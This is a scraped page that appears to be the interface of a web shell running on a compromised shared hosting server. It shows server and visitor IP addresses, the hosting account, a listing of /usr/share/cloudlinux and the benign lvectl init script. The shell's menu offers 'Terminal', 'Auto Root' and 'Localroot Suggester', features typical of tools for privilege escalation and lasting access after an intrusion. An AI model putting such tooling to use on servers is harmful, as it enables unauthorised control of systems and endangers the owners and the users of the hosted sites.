Linux evo.fastest-server.com 5.14.0-284.1101.el9.tuxcare.11.els11.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 14 13:30:35 UTC 2026 x86_64
LiteSpeed
Server IP : 103.249.112.113 & Your IP : 216.73.217.135
Domains : 988 Domain
User : tanishks
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
cloudlinux /
Delete
Unzip
Name
Size
Permission
Date
Action
cl_plus
[ DIR ]
drwxr-xr-x
2026-09-04 11:36
hooks
[ DIR ]
drw-------
2026-09-04 11:42
lveutils_crons
[ DIR ]
drwxr-xr-x
2026-09-04 11:36
wpos
[ DIR ]
drwxr-xr-x
2026-09-04 11:37
xray
[ DIR ]
drwxr-xr-x
2026-09-04 11:37
.app_detector_cron_ver
2
B
-rw-r--r--
2026-09-04 11:34
.force_collecting_domains_is_done
0
B
-rw-r--r--
2026-09-08 18:39
accelerate-wp.version
23
B
-rw-r--r--
2026-07-31 10:23
add_clwpos_crons.sh
1.81
KB
-rwxr-xr-x
2026-07-31 10:23
alt-python27-cllib
24
B
-rw-r--r--
2026-08-05 07:40
cagefs
24
B
-rw-r--r--
2026-07-31 12:29
clean_packages.sh
396
B
-rwxr-xr-x
2026-07-29 13:24
clgetcpanelemail
288
B
-rwxr-xr-x
2026-07-29 13:24
cloudlinux_clean_hosting_packages.py
2.69
KB
-rwxr-xr-x
2026-07-29 13:24
clwpos_monitoring.service
679
B
-rw-r--r--
2026-07-31 10:23
clwposcron
513
B
-rwxr-xr-x
2026-07-31 10:23
license_out_of_date_email.txt
1.09
KB
-rw-r--r--
2026-07-29 13:24
lve-stats
12
B
-rw-r--r--
2026-06-23 08:44
lve-utils
24
B
-rw-r--r--
2026-07-29 13:45
lve_namespaces
894
B
-rwxr-xr-x
2026-07-29 13:24
lvectl
905
B
-rwxr-xr-x
2026-07-29 13:24
lvemanager
25
B
-rw-r--r--
2026-08-11 11:38
no_valid_license_screen.txt
1016
B
-rw-r--r--
2026-07-29 13:24
plesk-accelerate-wp-latest.zip
17.23
KB
-rw-r--r--
2026-07-31 10:23
plesk_sync_package_id
1.19
KB
-rwxr-xr-x
2026-07-29 13:24
remount_proc.py
581
B
-rwxr-xr-x
2026-07-29 13:24
reset_effective_cache.sh
439
B
-rwxr-xr-x
2026-07-29 13:24
Save
Rename
#!/usr/bin/bash # # lvectl Startup script for lve default initialization # # Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2021 All Rights Reserved # # Licensed under CLOUD LINUX LICENSE AGREEMENT # http://cloudlinux.com/docs/LICENSE.TXT prog="lvectl" RETVAL=0 start() { # Do not start if there is no config file. [ ! -f /proc/lve/list ] && return 6 /usr/sbin/lvectl --reload-binaries > /dev/null 2>&1 /usr/sbin/lvectl --apply all RETVAL=$? sleep 3 return $RETVAL } stop() { return 0 } reload() { /usr/sbin/lvectl --reload-binaries > /dev/null 2>&1 /usr/sbin/lvectl apply all RETVAL=$? return $RETVAL } # See how we were called. case "$1" in start) start ;; stop) stop ;; reload) reload ;; *) echo $"Usage: $prog {start|stop|reload}" exit 1 esac RETVAL=$? exit $RETVAL